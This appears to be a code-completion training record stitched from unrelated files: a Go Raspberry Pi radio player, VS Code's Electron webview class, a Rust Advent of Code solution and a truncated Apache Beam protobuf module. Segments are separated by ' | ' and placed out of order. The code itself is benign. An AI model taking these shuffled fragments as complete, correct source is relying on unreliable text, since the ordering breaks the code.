if len(contentArr) > 0 {
idx, err = strconv.Atoi(contentArr[0])
}
if len(contentArr) > 1 && len(contentArr[1]) > 0 {
volAnalog = contentArr[1]
} else {
volAnalog = defVolumeAnalog
}
if len(contentArr) > 2 && len(contentArr[2]) > 0 {
volBt = contentArr[2]
} else {
volBt = defVolumeBluetooth
}
}
logger.Trace("getStationAndVolumes: %d %s %s", idx, volAnalog, volBt)
return idx - 1, volAnalog, volBt
}
// saves the current station index and the volume levels
func saveStationAndVolumes() {
fileName := filepath.Join(homePath, "last_values")
var s = strconv.Itoa(stationIdx) + "\n" + volumeAnalog + "\n" + volumeBluetooth
err := ioutil.WriteFile(fileName, []byte(s), 0644)
if err != nil {
logger.Warn("Error writing file %s : %s", fileName, err)
}
logger.Trace("saveStationAndVolumes: %d %s %s", stationIdx, volumeAnalog, volumeBluetooth)
}
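// For illustration, the "last_values" file written above holds three lines:
// the station index, the analog volume and the bluetooth volume, e.g.
//
//	2
//	55
//	35
//
// When the file is missing, getStationAndVolumes falls back to the defaults (55 / 35).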
// loads the list with radio stations or creates a default list
func loadStations(fileName string) []radioStation {
var stations []radioStation
if fileExists(fileName) {
f, err := os.Open(fileName)
check(err)
//noinspection GoUnhandledErrorResult
defer f.Close()
scanner := bufio.NewScanner(f)
nr := 1
for scanner.Scan() {
line := strings.Trim(scanner.Text(), "\n\r")
items := strings.Split(line, ",")
if len(items) == 2 {
stations = append(stations,
radioStation{strconv.Itoa(nr) + " " + strings.TrimSpace(items[0]), strings.TrimSpace(items[1])})
nr++
}
}
check(scanner.Err())
}
if len(stations) == 0 {
stations = append(stations,
radioStation{"RadioHH", "http://stream.radiohamburg.de/rhh-live/mp3-192/linkradiohamburgde"})
stations = append(stations,
radioStation{"Jazz Radio", "http://jazzradio.ice.infomaniak.ch/jazzradio-high.mp3"})
stations = append(stations,
radioStation{"M1.FM Chillout", "http://tuner.m1.fm/chillout.mp3"})
}
return stations
}
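// Sketch of the expected "stations" file format: one "name,url" pair per line; lines that do
// not contain exactly one comma are skipped. The URLs below are placeholders, not real streams:
//   NDR 2,http://example.invalid/ndr2.mp3
//   Deutschlandfunk,http://example.invalid/dlf.mp3
// loadStations prefixes each name with its number, e.g. "1 NDR 2".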
func printBitrateVolume(lineNum int, bitrate string, volume string, muted bool) {
var s string
if muted {
volume = "-mute-"
}
if charsPerLine < 20 {
s = fmt.Sprintf("%-10v%8v", bitrate, volume)
} else {
s = fmt.Sprintf("%-10v%10v", bitrate, volume)
}
printLine(lineNum, s, false, true)
}
func isConnected(url string) bool {
resp, err := http.Get(url)
if err != nil {
return false
}
_ = resp.Body.Close() // close the body so the connection is not leaked
return true
}
// stops the running mplayer instance (if any) and starts a new one with the current station URL
func newStation() {
disp.Clear()
logger.Trace("New station: %s", stations[stationIdx].name)
printLine(0, "-> "+stations[stationIdx].name, false)
printLine(1, "", false)
printLine(2, "", false)
if stationIdx == 0 {
printLine(3, ipAddress, false)
} else {
printLine(3, time.Now().Format("15:04:05 02.01.06"), false)
}
if inPipe != nil {
_, _ = inPipe.Write([]byte("q"))
_ = inPipe.Close()
_ = outPipe.Close()
_ = command.Wait()
}
for {
if readyForMplayer {
break
}
logger.Trace("Waiting for 'readyForMplayer'...")
time.Sleep(time.Second)
}
if bluetoothConnected {
logger.Trace("Using BT volume " + volumeBluetooth)
volume = vol2VolString(volumeBluetooth)
command = exec.Command("mplayer", "-quiet", "-volume", volumeBluetooth, stations[stationIdx].url)
} else {
logger.Trace("Using Analog volume " + volumeAnalog)
volume = vol2VolString(volumeAnalog)
command = exec.Command("mplayer", "-quiet", "-volume", volumeAnalog, stations[stationIdx].url)
}
var err error
inPipe, err = command.StdinPipe()
check(err)
outPipe, err = command.StdoutPipe()
check(err)
err = command.Start()
check(err)
go func() {
pipeChan <- outPipe
}()
debounceWrite(saveStationAndVolumes)
}
func switchBacklightOn() {
disp.Backlight(true)
if *backlightOffPtr {
debounceBacklight(switchBacklightOff)
}
}
func switchBacklightOff() {
disp.Backlight(false)
}
// reads the paired Bluetooth audio devices into a slice and signals via 'readyForMplayer' that mplayer may be started
func checkBluetooth() {
// init part: get the list of paired bluetooth devices
result, err := exec.Command("bluetoothctl", "devices").Output()
if err != nil {
logger.Error(err.Error())
} else { | for _, s := range arr {
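// Each line from "bluetoothctl devices" is assumed to look roughly like
//   Device AA:BB:CC:DD:EE:FF Some Headset
// so parts[1] is the MAC address that is passed on to "bluetoothctl info".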
parts := strings.Split(s, " ")
if len(parts) > 1 {
info, err2 := exec.Command("bluetoothctl", "info", parts[1]).Output()
if err2 == nil {
if strings.Contains(string(info), "Audio Sink") {
btDevices = append(btDevices, parts[1])
logger.Info(parts[1])
if strings.Contains(string(info), "Connected: yes") {
logger.Info("BT connected to " + parts[1])
bluetoothConnected = true
}
}
}
}
}
}
readyForMplayer = true
}
// listens for BT events and restarts mplayer when a connect or disconnect is detected
func listenForBtChanges() {
lastExitCode := 999
for {
cmd := exec.Command("ls", "/dev/input/event0")
_ = cmd.Run()
exitCode := cmd.ProcessState.ExitCode()
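// Assumption behind the exit codes: /dev/input/event0 only exists while a Bluetooth
// audio device is connected, so "ls" returns 0 when connected and 2 (not found) when not.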
if exitCode == 2 {
// not connected
if lastExitCode == 0 {
logger.Info("Re-run mplayer (2)... ")
bluetoothConnected = false
stationMutex.Lock()
newStation()
stationMutex.Unlock()
}
for _, btDevice := range btDevices {
// logger.Info(fmt.Sprintf("Trying to connect device #%d %s", idx, btDevice))
cmd = exec.Command("bluetoothctl", "connect", btDevice)
_ = cmd.Run()
connectExitCode := cmd.ProcessState.ExitCode()
if connectExitCode == 0 {
logger.Info("Success with device " + btDevice)
break
}
}
} else if exitCode == 0 {
// connected
if lastExitCode == 2 {
logger.Info("Re-run mplayer (0)... ")
bluetoothConnected = true
stationMutex.Lock()
newStation()
stationMutex.Unlock()
}
}
lastExitCode = exitCode
time.Sleep(3 * time.Second)
}
}
// removes unneeded/unwanted strings from the title like " (CDM EDIT)" etc.
func removeNoise(title string) string {
opening := strings.Index(title, "(")
closing := strings.Index(title, ")")
// text must be enclosed by round brackets
if opening >= 0 && closing >= 0 && closing > opening {
remove := false
// fmt.Println("removing noise...")
noise := strings.ToLower(title[opening+1 : closing])
if len(noise) > 0 {
// fmt.Println("noise:", noise)
if strings.Contains(noise, "edit") ||
strings.Contains(noise, "mix") ||
strings.Contains(noise, "cdm") ||
strings.Contains(noise, "cut") ||
strings.Contains(noise, "rmx") ||
strings.Contains(noise, "cover") {
remove = true
}
}
if remove {
title = strings.ReplaceAll(title[:opening]+title[closing+1:], " ", " ")
title = strings.TrimSpace(strings.ReplaceAll(title, " .", ""))
if *debug {
logger.Info("removeNoise: %s", title)
}
}
}
return title
}
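// exampleRemoveNoise is a usage sketch (not called by the player); the titles are made up.
func exampleRemoveNoise() {
_ = removeNoise("Artist - Song (CDM Edit)") // bracket contains "edit"/"cdm", so it is stripped: "Artist - Song"
_ = removeNoise("Artist - Song (Live)") // "live" is not in the keyword list, so the title stays unchanged
}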
func vol2VolString(vol string) string {
var format string
if charsPerLine < 20 {
format = "V %s%%"
} else {
format = "Vol %s%%"
}
return fmt.Sprintf(format, vol)
}
func main() {
homePath = filepath.Join(getHomeDir(), ".piradio")
_ = os.MkdirAll(homePath, os.ModePerm)
config := logger.Config{
LogDir: filepath.Join(homePath, "log"),
LogFileMaxSize: 2,
LogFileMaxNum: 30,
LogFileNumToDel: 3,
LogDest: logger.LogDestFile,
Flag: logger.ControlFlagLogDate,
}
_ = logger.Init(&config)
logger.Trace("Starting piradio...")
logNetworkInterfaces()
// Commandline parameters
camelCasePtr = flag.Bool("camelCase", false, "set to format title")
debug = flag.Bool("debug", false, "set to output mplayer info on stdout")
lcdDelayPtr = flag.Int("lcdDelay", 3, "initial delay for LCD in s (1s...10s)")
noisePtr = flag.Bool("noise", false, "set to remove noise from title")
oledPtr = flag.Bool("oled", false, "set to use OLED Display")
noBluetoothPtr = flag.Bool("noBluetooth", false, "set to only use analog output")
backlightOffPtr = flag.Bool("backlightOff", false, "set to switch off backlight after some time")
backlightOffTimePtr = flag.Int("backlightOffTime", 15, "backlight switch off time in s (3s...3600s)")
scrollSpeedPtr = flag.Int("scrollSpeed", 500, "scroll speed in ms (100ms...10000ms)")
scrollStationPtr = flag.Bool("scrollStation", false, "set to scroll station names")
flag.Parse()
if *backlightOffTimePtr < 3 {
*backlightOffTimePtr = 3
}
if *backlightOffTimePtr > 3600 {
*backlightOffTimePtr = 3600
}
if *scrollSpeedPtr < 100 {
*scrollSpeedPtr = 100
}
if *scrollSpeedPtr > 10000 {
*scrollSpeedPtr = 10000
}
if *lcdDelayPtr < 1 {
*lcdDelayPtr = 1
}
if *lcdDelayPtr > 10 {
*lcdDelayPtr = 10
}
var err error
if *oledPtr {
disp, err = oled.New(*scrollSpeedPtr)
} else {
disp, err = lcd.New(*scrollStationPtr, *scrollSpeedPtr, *lcdDelayPtr)
}
if err != nil {
logger.Error("Couldn't initialize display: %s", err)
}
// only query the display after the init error has been checked
charsPerLine = disp.GetCharsPerLine()
// Load gpio drivers:
if _, err = host.Init(); err != nil {
check(err)
}
// Look up the pins by name and configure them as inputs with the internal pull-up resistor enabled:
pNextStation := gpioreg.ByName("GPIO5")
if pNextStation == nil {
logger.Error("Failed to find GPIO5")
}
if err := pNextStation.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pPrevStation := gpioreg.ByName("GPIO6")
if pPrevStation == nil {
logger.Error("Failed to find GPIO6")
}
if err := pPrevStation.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pVolUp := gpioreg.ByName("GPIO19")
if pVolUp == nil {
logger.Error("Failed to find GPIO19")
}
if err := pVolUp.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pVolDown := gpioreg.ByName("GPIO26")
if pVolDown == nil {
logger.Error("Failed to find GPIO26")
}
if err := pVolDown.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
pMuteAudio := gpioreg.ByName("GPIO16")
if pMuteAudio == nil {
logger.Error("Failed to find GPIO16")
}
if err := pMuteAudio.In(gpio.PullUp, gpio.NoEdge); err != nil {
check(err)
}
var statusChan = make(chan string)
var ctrlChan = make(chan os.Signal)
var volumeMutex = &sync.Mutex{}
debounceBtn := debouncer.New(debounceTime * time.Millisecond)
debounceWrite = debouncer.New(debounceWriteToFileTime * time.Second)
debounceBacklight = debouncer.New(time.Duration(*backlightOffTimePtr) * time.Second)
// the following 4 functions handle the pressed buttons
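// They work by writing mplayer's default keyboard commands to its stdin:
// '*' raises the volume, '/' lowers it, 'm' toggles mute and (in newStation above) 'q' quits.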
fpPrev := func() {
stationMutex.Lock()
stationIdx-- // previous station
if stationIdx < 0 {
stationIdx = len(stations) - 1
}
newStation()
stationMutex.Unlock()
}
fpNext := func() {
stationMutex.Lock()
stationIdx++ // next station
stationIdx = stationIdx % len(stations)
newStation()
stationMutex.Unlock()
}
fpUp := func() {
volumeMutex.Lock()
_, err = inPipe.Write([]byte("*")) // increase volume
volumeMutex.Unlock()
check(err)
debounceWrite(saveStationAndVolumes)
}
fpDown := func() {
volumeMutex.Lock()
_, err = inPipe.Write([]byte("/")) // decrease volume
volumeMutex.Unlock()
check(err)
debounceWrite(saveStationAndVolumes)
}
fpMute := func() {
volumeMutex.Lock()
_, err = inPipe.Write([]byte("m")) // toggle mute
volumeMutex.Unlock()
check(err)
}
signal.Notify(ctrlChan, os.Interrupt, syscall.SIGTERM) // SIGKILL cannot be caught, so registering it would have no effect
stations = loadStations(filepath.Join(homePath, "stations"))
stationIdx, volumeAnalog, volumeBluetooth = getStationAndVolumes()
go checkBluetooth()
// this goroutine polls the GPIO levels and calls the debouncer when a low level is found (a pressed button pulls the line low against the pull-up resistor)
go func() {
for {
switch {
case pNextStation.Read() == false:
debounceBtn(fpNext) // next station
switchBacklightOn()
case pPrevStation.Read() == false:
debounceBtn(fpPrev) // previous station
switchBacklightOn()
case pVolUp.Read() == false:
if !muted {
debounceBtn(fpUp) // increase volume
}
switchBacklightOn()
case pVolDown.Read() == false:
if !muted {
debounceBtn(fpDown) // decrease volume
}
switchBacklightOn()
case pMuteAudio.Read() == false:
debounceBtn(fpMute) // toggle mute
switchBacklightOn()
}
time.Sleep(70 * time.Millisecond)
}
}()
// this goroutine waits for piradio to be stopped
go func() {
<-ctrlChan
logger.Trace("Ctrl+C received... Exiting")
close(statusChan)
close(pipeChan)
os.Exit(1)
}()
switchBacklightOn()
// this goroutine reads the output from mplayer and feeds the lines into statusChan
go func() {
for {
outPipe := <-pipeChan
reader := bufio.NewReader(outPipe)
for {
data, err := reader.ReadString('\n')
if err != nil {
statusChan <- "Playing stopped"
logger.Trace("Playing stopped... starting new mplayer in 10s")
time.Sleep(10 * time.Second)
newStation()
break
} else {
statusChan <- data
}
}
}
}()
// Used to test whether the URL is reachable on startup. This matters when piradio is started
// via rc.local at boot, because the internet connection might not be up yet.
for !isConnected(stations[0].url) {
logger.Trace("URL %s is NOT available", stations[0].url)
time.Sleep(300 * time.Millisecond)
}
fpNext()
if !*noBluetoothPtr {
go listenForBtChanges()
}
// loop for processing the output of mplayer
for {
select {
case line := <-statusChan:
if *debug && len(strings.TrimSpace(line)) > 0 {
fmt.Print("Process output: " + line)
}
if strings.Index(line, "Name") == 0 {
name := strings.Split(line, ":")
if len(name) > 1 {
s := strings.Trim(name[1], " \n")
// logger.Trace("Station: " + s)
printLine(0, s, *scrollStationPtr)
logger.Info("Station: " + s)
currentStation = s
}
}
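// The ICY metadata line is assumed to look roughly like
//   ICY Info: StreamTitle='Artist - Title';StreamUrl='';
// the code below cuts off the "ICY Info: " prefix, splits on ';' and takes the
// text between "StreamTitle='" and the trailing quote.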
if strings.Index(line, "ICY Info:") == 0 {
icy2 := line[10:]
st := strings.Split(icy2, ";")
for _, value := range st {
if strings.Index(value, "StreamTitle=") == 0 {
title := value[13 : len(value)-1]
trenner := strings.Index(title, " - ")
if trenner > 0 {
printLine(1, title[:trenner], true)
printLine(2, title[trenner+3:], true)
if strings.TrimSpace(title) != "-" && title != currentStation {
logger.Info("Title: " + title)
}
} else {
printLine(1, title, true)
printLine(2, "", false)
}
}
}
}
if strings.Index(line, "Bitrate") == 0 {
bitrateArr := strings.Split(line, ":")
if len(bitrateArr) > 1 {
bitrate = strings.Trim(bitrateArr[1], " \n")
logger.Trace("Bitrate: " + bitrate)
printBitrateVolume(3, bitrate, volume, muted)
}
}
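// mplayer's status lines are assumed to look like "Volume: 85 %" and
// "Mute: enabled" / "Mute: disabled"; only the number (or the enabled keyword)
// after the colon is used below.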
if strings.Index(line, "Volume:") >= 0 {
volumeArr := strings.Split(line, ":")
if len(volumeArr) > 1 {
v := strings.Split(strings.Trim(volumeArr[1], " \n"), " ")[0]
volume = vol2VolString(v)
logger.Trace("Volume: " + v)
printBitrateVolume(3, bitrate, volume, muted)
if bluetoothConnected {
volumeBluetooth = v
} else {
volumeAnalog = v
}
}
}
if strings.Index(line, "Mute:") >= 0 {
muteArr := strings.Split(line, ":")
if len(muteArr) > 1 {
muted = strings.Contains(muteArr[1], "enabled")
printBitrateVolume(3, bitrate, volume, muted)
}
}
}
}
} | arr := strings.Split(string(result), "\n")
logger.Info("BT Devices paired:") |
webviewElement.ts | /*---------------------------------------------------------------------------------------------
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License. See License.txt in the project root for license information.
*--------------------------------------------------------------------------------------------*/
import { FindInPageOptions, WebviewTag } from 'electron';
import { addDisposableListener } from 'vs/base/browser/dom';
import { ThrottledDelayer } from 'vs/base/common/async';
import { Emitter, Event } from 'vs/base/common/event';
import { once } from 'vs/base/common/functional';
import { IDisposable } from 'vs/base/common/lifecycle';
import { FileAccess, Schemas } from 'vs/base/common/network';
import { IConfigurationService } from 'vs/platform/configuration/common/configuration';
import { IFileService } from 'vs/platform/files/common/files';
import { IInstantiationService } from 'vs/platform/instantiation/common/instantiation';
import { IMainProcessService } from 'vs/platform/ipc/electron-sandbox/services';
import { ILogService } from 'vs/platform/log/common/log';
import { INotificationService } from 'vs/platform/notification/common/notification';
import { IRemoteAuthorityResolverService } from 'vs/platform/remote/common/remoteAuthorityResolver';
import { ITunnelService } from 'vs/platform/remote/common/tunnel';
import { IRequestService } from 'vs/platform/request/common/request';
import { ITelemetryService } from 'vs/platform/telemetry/common/telemetry';
import { webviewPartitionId } from 'vs/platform/webview/common/resourceLoader';
import { BaseWebview, WebviewMessageChannels } from 'vs/workbench/contrib/webview/browser/baseWebviewElement';
import { WebviewThemeDataProvider } from 'vs/workbench/contrib/webview/browser/themeing';
import { Webview, WebviewContentOptions, WebviewExtensionDescription, WebviewOptions } from 'vs/workbench/contrib/webview/browser/webview';
import { WebviewFindDelegate, WebviewFindWidget } from 'vs/workbench/contrib/webview/browser/webviewFindWidget';
import { WebviewIgnoreMenuShortcutsManager } from 'vs/workbench/contrib/webview/electron-browser/webviewIgnoreMenuShortcutsManager';
import { rewriteVsCodeResourceUrls } from 'vs/workbench/contrib/webview/electron-sandbox/resourceLoading';
import { IWorkbenchEnvironmentService } from 'vs/workbench/services/environment/common/environmentService';
export class ElectronWebviewBasedWebview extends BaseWebview<WebviewTag> implements Webview, WebviewFindDelegate {
private static _webviewKeyboardHandler: WebviewIgnoreMenuShortcutsManager | undefined;
private static getWebviewKeyboardHandler(
configService: IConfigurationService,
mainProcessService: IMainProcessService,
) {
if (!this._webviewKeyboardHandler) {
this._webviewKeyboardHandler = new WebviewIgnoreMenuShortcutsManager(configService, mainProcessService);
}
return this._webviewKeyboardHandler;
}
private _webviewFindWidget: WebviewFindWidget | undefined;
private _findStarted: boolean = false;
private readonly _focusDelayer = this._register(new ThrottledDelayer(10));
private _elementFocusImpl!: (options?: FocusOptions | undefined) => void;
constructor(
id: string,
options: WebviewOptions,
contentOptions: WebviewContentOptions,
extension: WebviewExtensionDescription | undefined,
private readonly _webviewThemeDataProvider: WebviewThemeDataProvider,
@ILogService private readonly _myLogService: ILogService,
@IInstantiationService instantiationService: IInstantiationService,
@ITelemetryService telemetryService: ITelemetryService,
@IWorkbenchEnvironmentService environmentService: IWorkbenchEnvironmentService,
@IConfigurationService configurationService: IConfigurationService,
@IMainProcessService mainProcessService: IMainProcessService,
@INotificationService notificationService: INotificationService,
@IFileService fileService: IFileService,
@IRequestService requestService: IRequestService, | notificationService,
logService: _myLogService,
telemetryService,
environmentService,
fileService,
requestService,
tunnelService,
remoteAuthorityResolverService
});
/* __GDPR__
"webview.createWebview" : {
"extension": { "classification": "SystemMetaData", "purpose": "FeatureInsight" },
"enableFindWidget": { "classification": "SystemMetaData", "purpose": "FeatureInsight", "isMeasurement": true },
"webviewElementType": { "classification": "SystemMetaData", "purpose": "FeatureInsight", "isMeasurement": true }
}
*/
telemetryService.publicLog('webview.createWebview', {
enableFindWidget: !!options.enableFindWidget,
extension: extension?.id.value,
webviewElementType: 'webview',
});
this._myLogService.debug(`Webview(${this.id}): init`);
this._register(addDisposableListener(this.element!, 'dom-ready', once(() => {
this._register(ElectronWebviewBasedWebview.getWebviewKeyboardHandler(configurationService, mainProcessService).add(this.element!));
})));
this._register(addDisposableListener(this.element!, 'console-message', function (e: { level: number; message: string; line: number; sourceId: string; }) {
console.log(`[Embedded Page] ${e.message}`);
}));
this._register(addDisposableListener(this.element!, 'dom-ready', () => {
this._myLogService.debug(`Webview(${this.id}): dom-ready`);
// Workaround for https://github.com/electron/electron/issues/14474
if (this.element && (this.isFocused || document.activeElement === this.element)) {
this.element.blur();
this.element.focus();
}
}));
this._register(addDisposableListener(this.element!, 'crashed', () => {
console.error('embedded page crashed');
}));
this._register(this.on('synthetic-mouse-event', (rawEvent: any) => {
if (!this.element) {
return;
}
const bounds = this.element.getBoundingClientRect();
try {
window.dispatchEvent(new MouseEvent(rawEvent.type, {
...rawEvent,
clientX: rawEvent.clientX + bounds.left,
clientY: rawEvent.clientY + bounds.top,
}));
return;
} catch {
// CustomEvent was treated as MouseEvent so don't do anything - https://github.com/microsoft/vscode/issues/78915
return;
}
}));
this._register(this.on('did-set-content', () => {
this._myLogService.debug(`Webview(${this.id}): did-set-content`);
if (this.element) {
this.element.style.flex = '';
this.element.style.width = '100%';
this.element.style.height = '100%';
}
}));
this._register(addDisposableListener(this.element!, 'devtools-opened', () => {
this._send('devtools-opened');
}));
if (options.enableFindWidget) {
this._webviewFindWidget = this._register(instantiationService.createInstance(WebviewFindWidget, this));
this._register(addDisposableListener(this.element!, 'found-in-page', e => {
this._hasFindResult.fire(e.result.matches > 0);
}));
this.styledFindWidget();
}
// We must ensure to put a `file:` URI as the preload attribute
// and not the `vscode-file` URI because preload scripts are loaded
// via node.js from the main side and only allow `file:` protocol
this.element!.preload = FileAccess.asFileUri('./pre/electron-index.js', require).toString(true);
this.element!.src = `${Schemas.vscodeWebview}://${this.id}/electron-browser-index.html?platform=electron&id=${this.id}&vscode-resource-origin=${encodeURIComponent(this.webviewResourceEndpoint)}`;
}
protected createElement(options: WebviewOptions) {
// Do not start loading the webview yet.
// Wait the end of the ctor when all listeners have been hooked up.
const element = document.createElement('webview');
this._elementFocusImpl = element.focus.bind(element);
element.focus = () => {
this.doFocus();
};
element.setAttribute('partition', webviewPartitionId);
element.setAttribute('webpreferences', 'contextIsolation=yes');
element.className = `webview ${options.customClasses || ''}`;
element.style.flex = '0 1';
element.style.width = '0';
element.style.height = '0';
element.style.outline = '0';
return element;
}
public override set contentOptions(options: WebviewContentOptions) {
this._myLogService.debug(`Webview(${this.id}): will set content options`);
super.contentOptions = options;
}
private get webviewResourceEndpoint(): string {
return `https://${this.id}.vscode-webview-test.com`;
}
protected readonly extraContentOptions = {};
public override set html(value: string) {
this._myLogService.debug(`Webview(${this.id}): will set html`);
super.html = rewriteVsCodeResourceUrls(this.id, value);
}
public mountTo(parent: HTMLElement) {
if (!this.element) {
return;
}
if (this._webviewFindWidget) {
parent.appendChild(this._webviewFindWidget.getDomNode()!);
}
parent.appendChild(this.element);
}
protected async doPostMessage(channel: string, data?: any): Promise<void> {
this._myLogService.debug(`Webview(${this.id}): did post message on '${channel}'`);
this.element?.send(channel, data);
}
public focus(): void {
this.doFocus();
// Handle focus change programmatically (do not rely on event from <webview>)
this.handleFocusChange(true);
}
private doFocus() {
if (!this.element) {
return;
}
// Clear the existing focus first if not already on the webview.
// This is required because the next part where we set the focus is async.
if (document.activeElement && document.activeElement instanceof HTMLElement && document.activeElement !== this.element) {
// Don't blur if on the webview because this will also happen async and may unset the focus
// after the focus trigger fires below.
document.activeElement.blur();
}
// Workaround for https://github.com/microsoft/vscode/issues/75209
// Electron's webview.focus is async so for a sequence of actions such as:
//
// 1. Open webview
// 2. Show quick pick from command palette
//
// We end up focusing the webview after showing the quick pick, which causes
// the quick pick to instantly dismiss.
//
// Workaround this by debouncing the focus and making sure we are not focused on an input
// when we try to re-focus.
this._focusDelayer.trigger(async () => {
if (!this.isFocused || !this.element) {
return;
}
if (document.activeElement && document.activeElement?.tagName !== 'BODY') {
return;
}
try {
this._elementFocusImpl();
} catch {
// noop
}
this._send('focus');
});
}
protected override style(): void {
super.style();
this.styledFindWidget();
}
private styledFindWidget() {
this._webviewFindWidget?.updateTheme(this._webviewThemeDataProvider.getTheme());
}
private readonly _hasFindResult = this._register(new Emitter<boolean>());
public readonly hasFindResult: Event<boolean> = this._hasFindResult.event;
public startFind(value: string, options?: FindInPageOptions) {
if (!value || !this.element) {
return;
}
// ensure options is defined without modifying the original
options = options || {};
// FindNext must be true for a first request
const findOptions: FindInPageOptions = {
forward: options.forward,
findNext: true,
matchCase: options.matchCase,
medialCapitalAsWordStart: options.medialCapitalAsWordStart
};
this._findStarted = true;
this.element.findInPage(value, findOptions);
}
/**
* Webviews expose a stateful find API.
* Successive calls to find will move forward or backward through onFindResults
* depending on the supplied options.
*
* @param value The string to search for. Empty strings are ignored.
*/
public find(value: string, previous: boolean): void {
if (!this.element) {
return;
}
// Searching with an empty value will throw an exception
if (!value) {
return;
}
const options = { findNext: false, forward: !previous };
if (!this._findStarted) {
this.startFind(value, options);
return;
}
this.element.findInPage(value, options);
}
public stopFind(keepSelection?: boolean): void {
this._hasFindResult.fire(false);
if (!this.element) {
return;
}
this._findStarted = false;
this.element.stopFindInPage(keepSelection ? 'keepSelection' : 'clearSelection');
}
public showFind() {
this._webviewFindWidget?.reveal();
}
public hideFind() {
this._webviewFindWidget?.hide();
}
public runFindAction(previous: boolean) {
this._webviewFindWidget?.find(previous);
}
public override selectAll() {
this.element?.selectAll();
}
public override copy() {
this.element?.copy();
}
public override paste() {
this.element?.paste();
}
public override cut() {
this.element?.cut();
}
public override undo() {
this.element?.undo();
}
public override redo() {
this.element?.redo();
}
protected override on<T = unknown>(channel: WebviewMessageChannels | string, handler: (data: T) => void): IDisposable {
if (!this.element) {
throw new Error('Cannot add event listener. No webview element found.');
}
return addDisposableListener(this.element, 'ipc-message', (event) => {
if (!this.element) {
return;
}
if (event.channel === channel && event.args && event.args.length) {
handler(event.args[0]);
}
});
}
} | @ITunnelService tunnelService: ITunnelService,
@IRemoteAuthorityResolverService remoteAuthorityResolverService: IRemoteAuthorityResolverService,
) {
super(id, options, contentOptions, extension, _webviewThemeDataProvider, { |
part2.rs | use std::collections::HashMap;
fn get_max(memory: &[usize]) -> (usize, usize) {
let mut idx = 0usize;
let mut value = 0usize;
for (idx0, value0) in memory.iter().enumerate() {
if *value0 > value {
value = *value0;
idx = idx0;
}
}
(idx, value)
}
pub fn | (data: &str) -> usize {
let mut memory: Vec<usize> = data.split_whitespace().map(|x| x.parse::<usize>().unwrap()).collect();
let mut cycles: HashMap<Vec<usize>, usize> = HashMap::new();
let mut steps = 0usize;
loop {
let (idx, mut left) = get_max(&memory);
memory[idx] = 0;
let mut next_idx = idx + 1;
loop {
if left == 0 {
break;
}
if next_idx >= memory.len() {
next_idx = 0;
}
memory[next_idx] += 1;
left -= 1;
next_idx += 1;
}
if cycles.contains_key(&memory) {
let prev_steps = cycles.get(&memory).unwrap();
return steps - prev_steps;
} else {
cycles.insert(memory.clone(), steps);
}
steps += 1;
}
}
#[cfg(test)]
mod tests {
use super::parse;
#[test]
fn day06_part2_test1() {
let data = "0 2 7 0";
assert_eq!(4, parse(data));
}
}
| parse |
beam_runner_api_pb2.py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: beam_runner_api.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='beam_runner_api.proto',
package='org.apache.beam.model.pipeline.v1',
syntax='proto3',
serialized_pb=_b('\n\x15\x62\x65\x61m_runner_api.proto\x12!org.apache.beam.model.pipeline.v1\x1a\x19google/protobuf/any.proto\x1a google/protobuf/descriptor.proto\"\xc2\x01\n\rBeamConstants\"\xb0\x01\n\tConstants\x12\x31\n\x14MIN_TIMESTAMP_MILLIS\x10\x00\x1a\x17\xaa\xb4\xfa\xc2\x05\x11-9223372036854775\x12\x30\n\x14MAX_TIMESTAMP_MILLIS\x10\x01\x1a\x16\xaa\xb4\xfa\xc2\x05\x10\x39\x32\x32\x33\x33\x37\x32\x30\x33\x36\x38\x35\x34\x37\x37\x35\x12>\n\"GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS\x10\x02\x1a\x16\xaa\xb4\xfa\xc2\x05\x10\x39\x32\x32\x33\x33\x37\x31\x39\x35\x30\x34\x35\x34\x37\x37\x35\"\xb5\x07\n\nComponents\x12Q\n\ntransforms\x18\x01 \x03(\x0b\x32=.org.apache.beam.model.pipeline.v1.Components.TransformsEntry\x12U\n\x0cpcollections\x18\x02 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.Components.PcollectionsEntry\x12\x64\n\x14windowing_strategies\x18\x03 \x03(\x0b\x32\x46.org.apache.beam.model.pipeline.v1.Components.WindowingStrategiesEntry\x12I\n\x06\x63oders\x18\x04 \x03(\x0b\x32\x39.org.apache.beam.model.pipeline.v1.Components.CodersEntry\x12U\n\x0c\x65nvironments\x18\x05 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.Components.EnvironmentsEntry\x1a`\n\x0fTransformsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12<\n\x05value\x18\x02 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.PTransform:\x02\x38\x01\x1a\x63\n\x11PcollectionsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12=\n\x05value\x18\x02 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.PCollection:\x02\x38\x01\x1ap\n\x18WindowingStrategiesEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x43\n\x05value\x18\x02 \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.WindowingStrategy:\x02\x38\x01\x1aW\n\x0b\x43odersEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x37\n\x05value\x18\x02 \x01(\x0b\x32(.org.apache.beam.model.pipeline.v1.Coder:\x02\x38\x01\x1a\x63\n\x11\x45nvironmentsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12=\n\x05value\x18\x02 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.Environment:\x02\x38\x01\"\xaf\x01\n\x08Pipeline\x12\x41\n\ncomponents\x18\x01 